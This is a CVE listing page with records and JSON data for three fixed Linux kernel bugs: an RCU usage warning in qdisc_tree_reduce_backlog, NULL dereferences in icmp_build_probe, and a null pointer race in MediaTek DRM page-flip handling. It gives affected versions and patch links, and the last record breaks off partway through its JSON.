In the Linux kernel, the following vulnerability has been resolved: net/sched: fix lockdep splat in qdisc_tree_reduce_backlog() qdisc_tree_reduce_backlog() is called with the qdisc lock held, not RTNL. We must use qdisc_lookup_rcu() instead of qdisc_lookup() syzbot reported: WARNING: suspicious RCU usage 6.1.74-syzkaller #0 Not tainted ----------------------------- net/sched/sch_api.c:305 suspicious rcu_dereference_protected() usage! other info that might help us debug this: rcu_scheduler_active = 2, debug_locks = 1 3 locks held by udevd/1142: #0: ffffffff87c729a0 (rcu_read_lock){....}-{1:2}, at: rcu_lock_acquire include/linux/rcupdate.h:306 [inline] #0: ffffffff87c729a0 (rcu_read_lock){....}-{1:2}, at: rcu_read_lock include/linux/rcupdate.h:747 [inline] #0: ffffffff87c729a0 (rcu_read_lock){....}-{1:2}, at: net_tx_action+0x64a/0x970 net/core/dev.c:5282 #1: ffff888171861108 (&sch->q.lock){+.-.}-{2:2}, at: spin_lock include/linux/spinlock.h:350 [inline] #1: ffff888171861108 (&sch->q.lock){+.-.}-{2:2}, at: net_tx_action+0x754/0x970 net/core/dev.c:5297 #2: ffffffff87c729a0 (rcu_read_lock){....}-{1:2}, at: rcu_lock_acquire include/linux/rcupdate.h:306 [inline] #2: ffffffff87c729a0 (rcu_read_lock){....}-{1:2}, at: rcu_read_lock include/linux/rcupdate.h:747 [inline] #2: ffffffff87c729a0 (rcu_read_lock){....}-{1:2}, at: qdisc_tree_reduce_backlog+0x84/0x580 net/sched/sch_api.c:792 stack backtrace: CPU: 1 PID: 1142 Comm: udevd Not tainted 6.1.74-syzkaller #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/25/2024 Call Trace: <TASK> [<ffffffff85b85f14>] __dump_stack lib/dump_stack.c:88 [inline] [<ffffffff85b85f14>] dump_stack_lvl+0x1b1/0x28f lib/dump_stack.c:106 [<ffffffff85b86007>] dump_stack+0x15/0x1e lib/dump_stack.c:113 [<ffffffff81802299>] lockdep_rcu_suspicious+0x1b9/0x260 kernel/locking/lockdep.c:6592 [<ffffffff84f0054c>] qdisc_lookup+0xac/0x6f0 net/sched/sch_api.c:305 [<ffffffff84f037c3>] qdisc_tree_reduce_backlog+0x243/0x580 net/sched/sch_api.c:811 [<ffffffff84f5b78c>] pfifo_tail_enqueue+0x32c/0x4b0 net/sched/sch_fifo.c:51 [<ffffffff84fbcf63>] qdisc_enqueue include/net/sch_generic.h:833 [inline] [<ffffffff84fbcf63>] netem_dequeue+0xeb3/0x15d0 net/sched/sch_netem.c:723 [<ffffffff84eecab9>] dequeue_skb net/sched/sch_generic.c:292 [inline] [<ffffffff84eecab9>] qdisc_restart net/sched/sch_generic.c:397 [inline] [<ffffffff84eecab9>] __qdisc_run+0x249/0x1e60 net/sched/sch_generic.c:415 [<ffffffff84d7aa96>] qdisc_run+0xd6/0x260 include/net/pkt_sched.h:125 [<ffffffff84d85d29>] net_tx_action+0x7c9/0x970 net/core/dev.c:5313 [<ffffffff85e002bd>] __do_softirq+0x2bd/0x9bd kernel/softirq.c:616 [<ffffffff81568bca>] invoke_softirq kernel/softirq.c:447 [inline] [<ffffffff81568bca>] __irq_exit_rcu+0xca/0x230 kernel/softirq.c:700 [<ffffffff81568ae9>] irq_exit_rcu+0x9/0x20 kernel/softirq.c:712 [<ffffffff85b89f52>] sysvec_apic_timer_interrupt+0x42/0x90 arch/x86/kernel/apic/apic.c:1107 [<ffffffff85c00ccb>] asm_sysvec_apic_timer_interrupt+0x1b/0x20 arch/x86/include/asm/idtentry.h:656

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/b7d1ce2cc7192e8a0…
	https://git.kernel.org/stable/c/c040b99461a5bfc14…
	https://git.kernel.org/stable/c/07696415526bee060…
	https://git.kernel.org/stable/c/7eb322360b0266481…

Impacted products

Vendor

Product

Version

Linux

Affected: 9d9a38b5639fcefacc1e977567fb4b4e4a74d0b3 , < b7d1ce2cc7192e8a037faa3f5d3ba72c25976460 (git)
Affected: d636fc5dd692c8f4e00ae6e0359c0eceeb5d9bdb , < c040b99461a5bfc14c2d0cbb1780fcc3a4706c7e (git)
Affected: d636fc5dd692c8f4e00ae6e0359c0eceeb5d9bdb , < 07696415526bee0607e495017369c7303a4792e1 (git)
Affected: d636fc5dd692c8f4e00ae6e0359c0eceeb5d9bdb , < 7eb322360b0266481e560d1807ee79e0cef5742b (git)
Affected: 3a4741bb13caf482b877b10ac1bcf7390cad7077 (git)

Linux

Affected: 6.4
Unaffected: 0 , < 6.4 (semver)
Unaffected: 6.1.85 , ≤ 6.1.* (semver)
Unaffected: 6.6.26 , ≤ 6.6.* (semver)
Unaffected: 6.8.5 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35892",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-23T19:36:07.702598Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:34:22.702Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:48.741Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b7d1ce2cc7192e8a037faa3f5d3ba72c25976460"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c040b99461a5bfc14c2d0cbb1780fcc3a4706c7e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/07696415526bee0607e495017369c7303a4792e1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7eb322360b0266481e560d1807ee79e0cef5742b"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/sched/sch_api.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "b7d1ce2cc7192e8a037faa3f5d3ba72c25976460",
              "status": "affected",
              "version": "9d9a38b5639fcefacc1e977567fb4b4e4a74d0b3",
              "versionType": "git"
            },
            {
              "lessThan": "c040b99461a5bfc14c2d0cbb1780fcc3a4706c7e",
              "status": "affected",
              "version": "d636fc5dd692c8f4e00ae6e0359c0eceeb5d9bdb",
              "versionType": "git"
            },
            {
              "lessThan": "07696415526bee0607e495017369c7303a4792e1",
              "status": "affected",
              "version": "d636fc5dd692c8f4e00ae6e0359c0eceeb5d9bdb",
              "versionType": "git"
            },
            {
              "lessThan": "7eb322360b0266481e560d1807ee79e0cef5742b",
              "status": "affected",
              "version": "d636fc5dd692c8f4e00ae6e0359c0eceeb5d9bdb",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "3a4741bb13caf482b877b10ac1bcf7390cad7077",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/sched/sch_api.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.4"
            },
            {
              "lessThan": "6.4",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.85",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.26",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.85",
                  "versionStartIncluding": "6.1.34",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.26",
                  "versionStartIncluding": "6.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.5",
                  "versionStartIncluding": "6.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "6.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.3.8",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: fix lockdep splat in qdisc_tree_reduce_backlog()\n\nqdisc_tree_reduce_backlog() is called with the qdisc lock held,\nnot RTNL.\n\nWe must use qdisc_lookup_rcu() instead of qdisc_lookup()\n\nsyzbot reported:\n\nWARNING: suspicious RCU usage\n6.1.74-syzkaller #0 Not tainted\n-----------------------------\nnet/sched/sch_api.c:305 suspicious rcu_dereference_protected() usage!\n\nother info that might help us debug this:\n\nrcu_scheduler_active = 2, debug_locks = 1\n3 locks held by udevd/1142:\n  #0: ffffffff87c729a0 (rcu_read_lock){....}-{1:2}, at: rcu_lock_acquire include/linux/rcupdate.h:306 [inline]\n  #0: ffffffff87c729a0 (rcu_read_lock){....}-{1:2}, at: rcu_read_lock include/linux/rcupdate.h:747 [inline]\n  #0: ffffffff87c729a0 (rcu_read_lock){....}-{1:2}, at: net_tx_action+0x64a/0x970 net/core/dev.c:5282\n  #1: ffff888171861108 (\u0026sch-\u003eq.lock){+.-.}-{2:2}, at: spin_lock include/linux/spinlock.h:350 [inline]\n  #1: ffff888171861108 (\u0026sch-\u003eq.lock){+.-.}-{2:2}, at: net_tx_action+0x754/0x970 net/core/dev.c:5297\n  #2: ffffffff87c729a0 (rcu_read_lock){....}-{1:2}, at: rcu_lock_acquire include/linux/rcupdate.h:306 [inline]\n  #2: ffffffff87c729a0 (rcu_read_lock){....}-{1:2}, at: rcu_read_lock include/linux/rcupdate.h:747 [inline]\n  #2: ffffffff87c729a0 (rcu_read_lock){....}-{1:2}, at: qdisc_tree_reduce_backlog+0x84/0x580 net/sched/sch_api.c:792\n\nstack backtrace:\nCPU: 1 PID: 1142 Comm: udevd Not tainted 6.1.74-syzkaller #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/25/2024\nCall Trace:\n \u003cTASK\u003e\n  [\u003cffffffff85b85f14\u003e] __dump_stack lib/dump_stack.c:88 [inline]\n  [\u003cffffffff85b85f14\u003e] dump_stack_lvl+0x1b1/0x28f lib/dump_stack.c:106\n  [\u003cffffffff85b86007\u003e] dump_stack+0x15/0x1e lib/dump_stack.c:113\n  [\u003cffffffff81802299\u003e] lockdep_rcu_suspicious+0x1b9/0x260 kernel/locking/lockdep.c:6592\n  [\u003cffffffff84f0054c\u003e] qdisc_lookup+0xac/0x6f0 net/sched/sch_api.c:305\n  [\u003cffffffff84f037c3\u003e] qdisc_tree_reduce_backlog+0x243/0x580 net/sched/sch_api.c:811\n  [\u003cffffffff84f5b78c\u003e] pfifo_tail_enqueue+0x32c/0x4b0 net/sched/sch_fifo.c:51\n  [\u003cffffffff84fbcf63\u003e] qdisc_enqueue include/net/sch_generic.h:833 [inline]\n  [\u003cffffffff84fbcf63\u003e] netem_dequeue+0xeb3/0x15d0 net/sched/sch_netem.c:723\n  [\u003cffffffff84eecab9\u003e] dequeue_skb net/sched/sch_generic.c:292 [inline]\n  [\u003cffffffff84eecab9\u003e] qdisc_restart net/sched/sch_generic.c:397 [inline]\n  [\u003cffffffff84eecab9\u003e] __qdisc_run+0x249/0x1e60 net/sched/sch_generic.c:415\n  [\u003cffffffff84d7aa96\u003e] qdisc_run+0xd6/0x260 include/net/pkt_sched.h:125\n  [\u003cffffffff84d85d29\u003e] net_tx_action+0x7c9/0x970 net/core/dev.c:5313\n  [\u003cffffffff85e002bd\u003e] __do_softirq+0x2bd/0x9bd kernel/softirq.c:616\n  [\u003cffffffff81568bca\u003e] invoke_softirq kernel/softirq.c:447 [inline]\n  [\u003cffffffff81568bca\u003e] __irq_exit_rcu+0xca/0x230 kernel/softirq.c:700\n  [\u003cffffffff81568ae9\u003e] irq_exit_rcu+0x9/0x20 kernel/softirq.c:712\n  [\u003cffffffff85b89f52\u003e] sysvec_apic_timer_interrupt+0x42/0x90 arch/x86/kernel/apic/apic.c:1107\n  [\u003cffffffff85c00ccb\u003e] asm_sysvec_apic_timer_interrupt+0x1b/0x20 arch/x86/include/asm/idtentry.h:656"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:56:01.353Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/b7d1ce2cc7192e8a037faa3f5d3ba72c25976460"
        },
        {
          "url": "https://git.kernel.org/stable/c/c040b99461a5bfc14c2d0cbb1780fcc3a4706c7e"
        },
        {
          "url": "https://git.kernel.org/stable/c/07696415526bee0607e495017369c7303a4792e1"
        },
        {
          "url": "https://git.kernel.org/stable/c/7eb322360b0266481e560d1807ee79e0cef5742b"
        }
      ],
      "title": "net/sched: fix lockdep splat in qdisc_tree_reduce_backlog()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35892",
    "datePublished": "2024-05-19T08:34:47.914Z",
    "dateReserved": "2024-05-17T13:50:33.113Z",
    "dateUpdated": "2025-05-04T12:56:01.353Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35857 (GCVE-0-2024-35857)

Vulnerability from cvelistv5 – Published: 2024-05-17 14:47 – Updated: 2025-05-04 09:06

Title

icmp: prevent possible NULL dereferences from icmp_build_probe()

Summary

In the Linux kernel, the following vulnerability has been resolved: icmp: prevent possible NULL dereferences from icmp_build_probe() First problem is a double call to __in_dev_get_rcu(), because the second one could return NULL. if (__in_dev_get_rcu(dev) && __in_dev_get_rcu(dev)->ifa_list) Second problem is a read from dev->ip6_ptr with no NULL check: if (!list_empty(&rcu_dereference(dev->ip6_ptr)->addr_list)) Use the correct RCU API to fix these. v2: add missing include <net/addrconf.h>

Severity ?

5.3 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CWE

CWE-476 - NULL Pointer Dereference

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/23b7ee4a8d559bf38…
	https://git.kernel.org/stable/c/599c9ad5e1d43f5c1…
	https://git.kernel.org/stable/c/d68dc711d84fdcf69…
	https://git.kernel.org/stable/c/3e2979bf080c40da4…
	https://git.kernel.org/stable/c/c58e88d49097bd12d…

Impacted products

Vendor

Product

Version

Linux

Affected: d329ea5bd8845f0b196bf41b18b6173340d6e0e4 , < 23b7ee4a8d559bf38eac7ce5bb2f6ebf76f9c401 (git)
Affected: d329ea5bd8845f0b196bf41b18b6173340d6e0e4 , < 599c9ad5e1d43f5c12d869f5fd406ba5d8c55270 (git)
Affected: d329ea5bd8845f0b196bf41b18b6173340d6e0e4 , < d68dc711d84fdcf698e5d45308c3ddeede586350 (git)
Affected: d329ea5bd8845f0b196bf41b18b6173340d6e0e4 , < 3e2979bf080c40da4f7c93aff8575ab8bc62b767 (git)
Affected: d329ea5bd8845f0b196bf41b18b6173340d6e0e4 , < c58e88d49097bd12dfcfef4f075b43f5d5830941 (git)

Linux

Affected: 5.13
Unaffected: 0 , < 5.13 (semver)
Unaffected: 5.15.158 , ≤ 5.15.* (semver)
Unaffected: 6.1.90 , ≤ 6.1.* (semver)
Unaffected: 6.6.30 , ≤ 6.6.* (semver)
Unaffected: 6.8.9 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "NETWORK",
              "availabilityImpact": "LOW",
              "baseScore": 5.3,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "NONE",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-35857",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-17T16:57:35.906301Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-476",
                "description": "CWE-476 NULL Pointer Dereference",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-11-07T21:12:11.212Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:47.567Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/23b7ee4a8d559bf38eac7ce5bb2f6ebf76f9c401"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/599c9ad5e1d43f5c12d869f5fd406ba5d8c55270"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d68dc711d84fdcf698e5d45308c3ddeede586350"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3e2979bf080c40da4f7c93aff8575ab8bc62b767"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c58e88d49097bd12dfcfef4f075b43f5d5830941"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/ipv4/icmp.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "23b7ee4a8d559bf38eac7ce5bb2f6ebf76f9c401",
              "status": "affected",
              "version": "d329ea5bd8845f0b196bf41b18b6173340d6e0e4",
              "versionType": "git"
            },
            {
              "lessThan": "599c9ad5e1d43f5c12d869f5fd406ba5d8c55270",
              "status": "affected",
              "version": "d329ea5bd8845f0b196bf41b18b6173340d6e0e4",
              "versionType": "git"
            },
            {
              "lessThan": "d68dc711d84fdcf698e5d45308c3ddeede586350",
              "status": "affected",
              "version": "d329ea5bd8845f0b196bf41b18b6173340d6e0e4",
              "versionType": "git"
            },
            {
              "lessThan": "3e2979bf080c40da4f7c93aff8575ab8bc62b767",
              "status": "affected",
              "version": "d329ea5bd8845f0b196bf41b18b6173340d6e0e4",
              "versionType": "git"
            },
            {
              "lessThan": "c58e88d49097bd12dfcfef4f075b43f5d5830941",
              "status": "affected",
              "version": "d329ea5bd8845f0b196bf41b18b6173340d6e0e4",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/ipv4/icmp.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.13"
            },
            {
              "lessThan": "5.13",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.158",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.90",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.30",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.158",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.90",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.30",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.9",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nicmp: prevent possible NULL dereferences from icmp_build_probe()\n\nFirst problem is a double call to __in_dev_get_rcu(), because\nthe second one could return NULL.\n\nif (__in_dev_get_rcu(dev) \u0026\u0026 __in_dev_get_rcu(dev)-\u003eifa_list)\n\nSecond problem is a read from dev-\u003eip6_ptr with no NULL check:\n\nif (!list_empty(\u0026rcu_dereference(dev-\u003eip6_ptr)-\u003eaddr_list))\n\nUse the correct RCU API to fix these.\n\nv2: add missing include \u003cnet/addrconf.h\u003e"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:06:58.879Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/23b7ee4a8d559bf38eac7ce5bb2f6ebf76f9c401"
        },
        {
          "url": "https://git.kernel.org/stable/c/599c9ad5e1d43f5c12d869f5fd406ba5d8c55270"
        },
        {
          "url": "https://git.kernel.org/stable/c/d68dc711d84fdcf698e5d45308c3ddeede586350"
        },
        {
          "url": "https://git.kernel.org/stable/c/3e2979bf080c40da4f7c93aff8575ab8bc62b767"
        },
        {
          "url": "https://git.kernel.org/stable/c/c58e88d49097bd12dfcfef4f075b43f5d5830941"
        }
      ],
      "title": "icmp: prevent possible NULL dereferences from icmp_build_probe()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35857",
    "datePublished": "2024-05-17T14:47:32.763Z",
    "dateReserved": "2024-05-17T13:50:33.106Z",
    "dateUpdated": "2025-05-04T09:06:58.879Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26874 (GCVE-0-2024-26874)

Vulnerability from cvelistv5 – Published: 2024-04-17 10:27 – Updated: 2025-05-04 08:58

Title

drm/mediatek: Fix a null pointer crash in mtk_drm_crtc_finish_page_flip

Summary

In the Linux kernel, the following vulnerability has been resolved: drm/mediatek: Fix a null pointer crash in mtk_drm_crtc_finish_page_flip It's possible that mtk_crtc->event is NULL in mtk_drm_crtc_finish_page_flip(). pending_needs_vblank value is set by mtk_crtc->event, but in mtk_drm_crtc_atomic_flush(), it's is not guarded by the same lock in mtk_drm_finish_page_flip(), thus a race condition happens. Consider the following case: CPU1 CPU2 step 1: mtk_drm_crtc_atomic_begin() mtk_crtc->event is not null, step 1: mtk_drm_crtc_atomic_flush: mtk_drm_crtc_update_config( !!mtk_crtc->event) step 2: mtk_crtc_ddp_irq -> mtk_drm_finish_page_flip: lock mtk_crtc->event set to null, pending_needs_vblank set to false unlock pending_needs_vblank set to true, step 2: mtk_crtc_ddp_irq -> mtk_drm_finish_page_flip called again, pending_needs_vblank is still true //null pointer Instead of guarding the entire mtk_drm_crtc_atomic_flush(), it's more efficient to just check if mtk_crtc->event is null before use.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/accdac6b71d5a2b84…
	https://git.kernel.org/stable/c/dfde84cc6c589f2a9…
	https://git.kernel.org/stable/c/4688be96d20ffa49d…
	https://git.kernel.org/stable/c/9beec711a17245b85…
	https://git.kernel.org/stable/c/d2bd30c710475b2e2…
	https://git.kernel.org/stable/c/a3dd12b64ae8373a4…
	https://git.kernel.org/stable/c/9acee29a38b4d4b70…
	https://git.kernel.org/stable/c/3fc88b246a2fc1601…
	https://git.kernel.org/stable/c/c958e86e9cc1b48ca…

Impacted products

Vendor

Product

Version

Linux

Affected: 119f5173628aa7a0c3cf9db83460d40709e8241d , < accdac6b71d5a2b84040c3d2234f53a60edc398e (git)
Affected: 119f5173628aa7a0c3cf9db83460d40709e8241d , < dfde84cc6c589f2a9f820f12426d97365670b731 (git)
Affected: 119f5173628aa7a0c3cf9db83460d40709e8241d , < 4688be96d20ffa49d2186523ee84f475f316fd49 (git)
Affected: 119f5173628aa7a0c3cf9db83460d40709e8241d , < 9beec711a17245b853d64488fd5b739031612340 (git)
Affected: 119f5173628aa7a0c3cf9db83460d40709e8241d , < d2bd30c710475b2e29288827d2c91f9e6e2b91d7 (git)
Affected: 119f5173628aa7a0c3cf9db83460d40709e8241d , < a3dd12b64ae8373a41a216a0b621df224210860a (git)
Affected: 119f5173628aa7a0c3cf9db83460d40709e8241d , < 9acee29a38b4d4b70f1f583e5ef9a245db4db710 (git)
Affected: 119f5173628aa7a0c3cf9db83460d40709e8241d , < 3fc88b246a2fc16014e374040fc15af1d3752535 (git)
Affected: 119f5173628aa7a0c3cf9db83460d40709e8241d , < c958e86e9cc1b48cac004a6e245154dfba8e163b (git)

Linux

Affected: 4.7
Unaffected: 0 , < 4.7 (semver)
Unaffected: 4.19.311 , ≤ 4.19.* (semver)
Unaffected: 5.4.273 , ≤ 5.4.* (semver)
Unaffected: 5.10.214 , ≤ 5.10.* (semver)
Unaffected: 5.15.153 , ≤ 5.15.* (semver)
Unaffected: 6.1.83 , ≤ 6.1.* (semver)
Unaffected: 6.6.23 , ≤ 6.6.* (semver)
Unaffected: 6.7.11 , ≤ 6.7.* (semver)
Unaffected: 6.8.2 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26874",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-04-23T14:01:58.775611Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-07-05T17:21:21.785Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:21:04.219Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/accdac6b71d5a2b84040c3d2234f53a60edc398e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/dfde84cc6c589f2a9f820f12426d97365670b731"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4688be96d20ffa49d2186523ee84f475f316fd49"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9beec711a17245b853d64488fd5b739031612340"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d2bd30c710475b2e29288827d2c91f9e6e2b91d7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a3dd12b64ae8373a41a216a0b621df224210860a"
          },
          {
